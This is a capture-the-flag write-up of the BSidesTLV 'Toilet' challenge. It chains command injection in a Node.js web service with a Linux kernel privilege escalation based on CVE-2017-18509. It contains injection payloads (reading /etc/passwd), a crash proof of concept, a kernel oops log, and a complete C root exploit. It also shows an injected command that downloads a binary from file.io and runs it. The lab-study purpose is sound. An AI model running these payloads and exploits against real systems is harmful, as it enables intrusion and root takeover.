Toilet

Toilet Challenge

Description

The challenge has two links, Local and Remote

Starting by entering on the remote link, a simple web page is shown.

Toilet web page

Clicking the flush button will reach a page with the input text printed as ASCII art.

Toilet ASCII

The local link sends us to a Github page with the following README.md

Understanding

"This is a kernel challenge (with a little web one at first :) ) !"

On the github repo we see a Dockerfile that creates an image containing a qemu system, with a small website, a specific Linux kernel (we will talk about it later), creates a user bsides:bsides, a flag file on /root/flag/flag.txt (chmod 400 on root user), and runs the qemu when docker is started.

Readme tells us:

About the bug:

  1. Achieve RCE in our webservice.
  2. 4.19.173 kernel, please achieve root privs with this bug

hint: /proc/kallsyms and /dev/kmsg is readable

Achieve RCE in our webservice

This is the easy part of the challenge.

The webservice runs a nodejs file.

The intersting part of the code is:

 var command = "toilet " + req.body.toilet_text + filter + " --html"
  exec(command.toString('utf8'), function (err, stdout, stderr) {
    if (err) {
      res.send("nope...");
    } else {
      res.send(stdout);
    }
  });

Classic Command Injection CWE-78

exec function, runs the command and enterns the lmbda function, in case of error nope... is being sent to the user, otherwise stdout of the command, is sent.

The command is created by concatenating the desired command toilet application with the parameters passed by the website, which is controled by the user.

So for example putting the command BSidesTLV2021 --html ; cat /etc/passwd ; echo into the website will lead on:

/etc/passwd

  1. DONE!

Achieve root privs

The original bug:

CVE-2017-18509: An issue was discovered in net/ipv6/ip6mr.c in the Linux kernel before 4.11. By setting a specific socket option, an attacker can control a pointer in kernel land and cause an inet_csk_listen_stop general protection fault, or potentially execute arbitrary code under certain circumstances. The issue can be triggered as root (e.g., inside a default LXC container or with the CAP_NET_ADMIN capability) or after namespace unsharing. This occurs because sk_type and protocol are not checked in the appropriate part of the ip6_mroute_* functions.

Missing mitigations

Kernel is running with nokaslr flag, and qemu CPU having SMAP and SMEP disabled. BTW it is the default configuration for qemu, if you want to enable them, you will need to add -cpu kvm64,smep,smap

Deep into the code

The bug into our code is even worse.

Looking at the code:

int ip6_mroute_setsockopt(struct sock *sk, int optname, char __user *optval, unsigned int optlen)
{
    int ret, parent = 0;
    struct mif6ctl vif;
    struct mf6cctl mfc;
    mifi_t mifi;
    struct net *net = sock_net(sk);
    struct mr_table *mrt;

    /*if (sk->sk_type != SOCK_RAW ||
        inet_sk(sk)->inet_num != IPPROTO_ICMPV6)
        return -EOPNOTSUPP;*/

  printk("raw6_sk(sk)->ip6mr_table = %p, %x\n", &raw6_sk(sk)->ip6mr_table, raw6_sk(sk)->ip6mr_table);
    mrt = ip6mr_get_table(net, raw6_sk(sk)->ip6mr_table ? : RT6_TABLE_DFLT);
    if (!mrt)
        return -ENOENT;

    /*if (optname != MRT6_INIT) {
        if (sk != rcu_access_pointer(mrt->mroute_sk) &&
            !ns_capable(net->user_ns, CAP_NET_ADMIN))
            return -EACCES;
    }*/

ip6_mroute_setsockopt kernel function is called when calling setsockopt on an IPV6 socket when the optname value is between MRT6_BASE and MRT6_MAX see ipv6_sockglue.c

The bug is that there is no verification that the socket is an ICMPv6 RAW socket.

The worse scenario we have on our code, is that there is no check of CAP_NET_ADMIN.

The advisory written by Denis Andzakovic LINUX KERNEL 4.9 - INET_CSK_LISTEN_STOP GPF (CVE-2017-18509) explains a potential way to code execution.

The code calls setsockopt with MRT6_TABLE optname

  switch (optname) {
  case MRT6_TABLE:
    {
        u32 v;

        if (optlen != sizeof(u32))
            return -EINVAL;
        if (get_user(v, (u32 __user *)optval))
            return -EFAULT;
        /* "pim6reg%u" should not exceed 16 bytes (IFNAMSIZ) */
        /*if (v != RT_TABLE_DEFAULT && v >= 100000000)
            return -EINVAL;*/
        if (sk == rcu_access_pointer(mrt->mroute_sk))
            return -EBUSY;

        rtnl_lock();
        ret = 0;
        mrt = ip6mr_new_table(net, v);
        if (IS_ERR(mrt))
            ret = PTR_ERR(mrt);
        else {
      printk("raw6_sk(sk)->ip6mr_table = v; \n"); 
            raw6_sk(sk)->ip6mr_table = v; 
    }
        rtnl_unlock();
        return ret;
    }

This code interprets the socket as a raw socket raw6_sk(sk) and writes to it raw6_sk(sk)->ip6mr_table = v the received int value from the user, which in this challenge it is no more sanctioned by verifiying v >= 100000000

Back to the POC

int main(){
        uint32_t opt = 99999999;
        int sock = socket(AF_INET6, SOCK_STREAM, 0);
        listen(sock, 0);
        setsockopt(sock, IPPROTO_IPV6, MRT6_TABLE, &opt, 4);
        close(sock); // boom
        return 0;
}

This code leads to this GPF, very similar to what Denis saw:

[  106.780011] raw6_sk(sk)->ip6mr_table = 00000000a6c3b904, 0
[  106.783755] mrt->id = 254, id = 254
[  106.784126] mrt->id = 254, id = 99999999
[  106.784384] mr_table_alloc!
[  106.785051] raw6_sk(sk)->ip6mr_table = v; 
[  106.787147] BUG: unable to handle kernel paging request at 0000000005f5e187
[  106.787147] PGD 0 P4D 0 
[  106.787147] Oops: 0000 [#1] SMP NOPTI
[  106.787147] CPU: 1 PID: 1899 Comm: toilet_crash Not tainted 4.19.173 #1
[  106.787147] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[  106.792713] RIP: 0010:inet_csk_listen_stop+0x132/0x260
[  106.792713] Code: 48 89 ef e8 00 a2 21 00 4c 8b a3 b8 03 00 00 48 89 ef 48 c7 83 b8 03 00 00 00 00 00 00 e8 86 a0 21 00 4d 85 e4 74 7b 4c 89 e5 <4d> 8b a4 24 88 00 00 00 f0 ff 8d 80 00 00 00 0f 88 04 30 21 00 75
[  106.792713] RSP: 0018:ffffc9000058fe08 EFLAGS: 00000206
[  106.792713] RAX: 0000000080000000 RBX: ffff88801b750000 RCX: 0000000000002d55
[  106.792713] RDX: 0000000000000001 RSI: 00000000fffffe01 RDI: ffffffff818302ba
[  106.792713] RBP: 0000000005f5e0ff R08: 0000000000023ea0 R09: ffffffff8182d729
[  106.792713] R10: ffffea000070cf00 R11: 0000000000000000 R12: 0000000005f5e0ff
[  106.792713] R13: ffff88801b750390 R14: ffff888013c3ff00 R15: ffff88801df94a30
[  106.792713] FS:  00007ff35eaaf500(0000) GS:ffff88801f280000(0000) knlGS:0000000000000000
[  106.792713] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  106.792713] CR2: 0000000005f5e187 CR3: 000000001db92000 CR4: 00000000000006e0
[  106.792713] Call Trace:
[  106.792713]  tcp_close+0x3d6/0x430
[  106.792713]  inet_release+0x2f/0x60
[  106.792713]  __sock_release+0x38/0xa0
[  106.792713]  sock_close+0xc/0x10
[  106.792713]  __fput+0xac/0x1e0
[  106.792713]  task_work_run+0x7c/0xa0
[  106.792713]  exit_to_usermode_loop+0x93/0xa0
[  106.792713]  do_syscall_64+0xc6/0xf0
[  106.792713]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  106.792713] RIP: 0033:0x7ff35e9d7b54
[  106.792713] Code: eb 8d e8 7f fc 01 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 8d 05 a9 5b 0d 00 8b 00 85 c0 75 13 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 3c c3 0f 1f 00 53 89 fb 48 83 ec 10 e8 e4 bb
[  106.792713] RSP: 002b:00007fffe7789ec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000003
[  106.792713] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007ff35e9d7b54
[  106.792713] RDX: 00000000000000d1 RSI: 0000000000000029 RDI: 0000000000000004
[  106.792713] RBP: 00007fffe7789ee0 R08: 0000000000000004 R09: 00007ff35eaa9d80
[  106.792713] R10: fffffffffffff47e R11: 0000000000000246 R12: 00005572bdeb7080
[  106.792713] R13: 00007fffe7789fc0 R14: 0000000000000000 R15: 0000000000000000
[  106.792713] Modules linked in:
[  106.792713] CR2: 0000000005f5e187
[  106.820165] ---[ end trace c9a568b366f41ce7 ]---
[  106.821074] RIP: 0010:inet_csk_listen_stop+0x132/0x260
[  106.821074] Code: 48 89 ef e8 00 a2 21 00 4c 8b a3 b8 03 00 00 48 89 ef 48 c7 83 b8 03 00 00 00 00 00 00 e8 86 a0 21 00 4d 85 e4 74 7b 4c 89 e5 <4d> 8b a4 24 88 00 00 00 f0 ff 8d 80 00 00 00 0f 88 04 30 21 00 75
[  106.824442] RSP: 0018:ffffc9000058fe08 EFLAGS: 00000206
[  106.824954] RAX: 0000000080000000 RBX: ffff88801b750000 RCX: 0000000000002d55
[  106.826636] RDX: 0000000000000001 RSI: 00000000fffffe01 RDI: ffffffff818302ba
[  106.827265] RBP: 0000000005f5e0ff R08: 0000000000023ea0 R09: ffffffff8182d729
[  106.827905] R10: ffffea000070cf00 R11: 0000000000000000 R12: 0000000005f5e0ff
[  106.828328] R13: ffff88801b750390 R14: ffff888013c3ff00 R15: ffff88801df94a30
[  106.829909] FS:  00007ff35eaaf500(0000) GS:ffff88801f280000(0000) knlGS:0000000000000000
[  106.830884] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  106.866233] CR2: 0000000005f5e187 CR3: 000000001db92000 CR4: 00000000000006e0
Killed

The crash happens in inet_csk_listen_stop when dereferencing req->dl_next and the address of the crash is 0x5f5e187 (which is 0x5F5E0FF [or 99999999] + 0x88 dl_next offset).

while (req != NULL) {
  next = req->dl_next;
  reqsk_put(req);
  req = next;
}

Lets have a look at reqsk_put function

static inline void reqsk_put(struct request_sock *req) {
    if (refcount_dec_and_test(&req->rsk_refcnt))
        reqsk_free(req);
}

The function decrements the ref count (at offset 0x80) and verifies if can be released ( == 0 after decrement), then it calls reqsk_free

static inline void reqsk_free(struct request_sock *req)
{
    /* temporary debugging */
    WARN_ON_ONCE(refcount_read(&req->rsk_refcnt) != 0);

    req->rsk_ops->destructor(req);
    if (req->rsk_listener)
        sock_put(req->rsk_listener);
    kfree(req->saved_syn);
    kmem_cache_free(req->rsk_ops->slab, req);
}

reqsk_free, dereferences req->rsk_ops (at offset 0xC0) and calls the destructor (at offset 0x30) function.

As we control req address, we control the destructor address.

Exploit

We start mapping an address that will fit the 32 bytes size (MRT6_TABLE limitation)

unsigned char* map = (unsigned char*)mmap(0x10000, 0x10000, (PROT_EXEC | PROT_READ | PROT_WRITE), (MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS), 0,0);

we set the table value for the setsockopt as the address of the mapped memory

table = (int)map;

ref_count is at offset 0x80

int* ref_count = (int*)&map[128];
*ref_count = 1;

rsk_ops is at offset 0xC0 and we point him to some address

uint64_t *rsk_ops = (uint64_t*)&map[0xc0];
*rsk_ops = 0x100c0;

destruct is at offset 0x30

uint64_t* destruct = (uint64_t*)((*rsk_ops) + 0x30);

Now we have the code execution, as we mentioned KASLR, SMEP and SMAP are disabled.

We want to make a privilege escalation to our process, and then read the flag.

The simplest way doing this is by calling two functions int commit_creds(struct cred *new) and struct cred *prepare_kernel_cred(struct task_struct *daemon).

commit_creds see ALTERING CREDENTIALS, as its name says receives a credential structure and commits to the current running process. prepare_kernel_cred, prepare a set of credentials for a kernel service, if daemon is NULL, credential will be set to 0 (root)

cat /proc/kallsyms | grep commit_creds
ffffffff8107c070 T commit_creds
cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff8107c420 T prepare_kernel_cred
#define KERNCALL __attribute__((regparm(3)))
void (*commit_creds)(void*) KERNCALL = (void*) 0xffffffff8107c070;
void *(*prepare_kernel_cred)(void*) KERNCALL = (void*) 0xffffffff8107c420;

static void priv_shell(void){
  commit_creds(prepare_kernel_cred(0));
    restore_state();
}

The missing part now is, that we run our code on kernel mode until we reach the destructor function, we call the priv_shell function, and then the code returns to the original kernel code, reqsk_free.

We want to "cut" the stack, and return the code to user mode (we used the same code from here).

struct TrapFrame{
    unsigned long rip;
    unsigned long cs;
    unsigned long rflags;
    unsigned long rsp;
    unsigned long ss;

}__attribute((packed));

struct TrapFrame tf;

static void save_state(void) {
    asm volatile(
            "movq %%cs, %0\n"
            "movq %%ss, %1\n"
            "pushfq\n"
            "popq %2\n"
            : "=r"(tf.cs), "=r"(tf.ss), "=r"(tf.rflags)
            :
            :"memory");
}

static void restore_state(void){
    asm volatile(
            "swapgs;"
            "movq %0, 0x20(%%rsp)\n"
            "movq %1, 0x18(%%rsp)\n"
            "movq %2, 0x10(%%rsp)\n"
            "movq %3, 0x8(%%rsp)\n"
            "movq %4, 0x0(%%rsp)\n"
            "iretq"
            :
            :"r"(tf.ss), "r"((unsigned long)0x11000), "r"(tf.rflags), "r"(tf.cs), "r"(shell)
            :"memory"            
            );            
}

save_state function - saves the CS (code segment) and SS (stack segment) registers and rflags (status register). restore_state function - switches GS back to user mode (swapgs), recreates the stack, and return (iretq interrupt return) to our shell function

static void shell(void) {
    char* argv[] = {"/bin/cat","/root/flag/flag.txt" ,NULL};
    execve(argv[0], argv, NULL);
}

We have everything to read the flag, now we need to run this code on the remote machine through the webserver RCE.

  1. Create a toilet.c file with all the code
  2. Compile it into the qemu local machine (gcc toilet.c -o toilet)
  3. curl -F "[email protected]" https://file.io (upload the compiled file to file.io, a simple file share service, one time URL) {"success":true,"status":200,"id":"51fd4580-eac2-11eb-b008-718efd7a117a","key":"txUPbPH82Ou5","name":"toilet","link":"https://file.io/txUPbPH82Ou5", "private":false,"expires":"2021-08-05T07}
  4. Inject the following code to the webserver flag --html ; curl https://file.io/txUPbPH82Ou5 -o /tmp/toilet_jctf ; chmod 777 /tmp/toilet_jctf ; /tmp/toilet_jctf ; rm /tmp/toilet_jctf ; echo
  5. flag

Appendix

toilet.c

#include <netinet/icmp6.h>
#ifdef __linux__
#include <linux/mroute6.h>
#else
#include <netinet6/ip6_mroute.h>
#endif

#include <sys/socket.h>
#include <netinet/in.h>
#include <net/if.h>
#include <errno.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/mman.h>

#define MRT6_BASE    200
#define MRT6_TABLE    (MRT6_BASE+9)    /* Specify mroute table ID        */

struct TrapFrame {
    unsigned long rip;
    unsigned long cs;
    unsigned long rflags;
    unsigned long rsp;
    unsigned long ss;

}__attribute((packed));

struct TrapFrame tf;

#define KERNCALL __attribute__((regparm(3)))
void (*commit_creds)(void*) KERNCALL = (void*) 0xffffffff8107c070;
void *(*prepare_kernel_cred)(void*) KERNCALL = (void*) 0xffffffff8107c420;

static void shell(void) {
    char* argv[] = {"/bin/cat","/root/flag/flag.txt", NULL};
    execve(argv[0], argv, NULL);
}

static void save_state(void) {
    asm volatile(
            "movq %%cs, %0\n"
            "movq %%ss, %1\n"
            "pushfq\n"
            "popq %2\n"
            : "=r"(tf.cs), "=r"(tf.ss), "=r"(tf.rflags)
            :
            :"memory");
}

static void restore_state(void) {
    asm volatile(
            "swapgs;"
            "movq %0, 0x20(%%rsp)\n"
            "movq %1, 0x18(%%rsp)\n"
            "movq %2, 0x10(%%rsp)\n"
            "movq %3, 0x8(%%rsp)\n"
            "movq %4, 0x0(%%rsp)\n"
            "iretq"
            :
            :"r"(tf.ss), "r"((unsigned long)0x11000), "r"(tf.rflags), "r"(tf.cs), "r"(shell)
            :"memory"            
            );
}

static void priv_shell(void) {
    commit_creds(prepare_kernel_cred(0));
    restore_state();
}

void main() {
    int table = 0;

    save_state();

    unsigned char* map = mmap(
      (void*)0x10000, // address 
      0x10000, // size
      (PROT_EXEC | PROT_READ | PROT_WRITE), // prot
      (MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED), //flags
       0,0);
    
    if(!map) exit(-1);

    memset(map,0,0x1000);
    printf("map = %p\n", map);
    table = (int)map;

    int* ref_count = (int*)&map[128];
    *ref_count = 1;

    uint64_t *rsk_ops = (uint64_t*)&map[0xc0];
    *rsk_ops = 0x100c0;

    uint64_t* destruct = (uint64_t*)((*rsk_ops) + 0x30);
    *destruct = &priv_shell;

    int sock;
    sock = socket(AF_INET6, SOCK_STREAM, 0);
    listen(sock,0);
    setsockopt (sock, IPPROTO_IPV6, MRT6_TABLE, &table, sizeof (table));
    close(sock);
}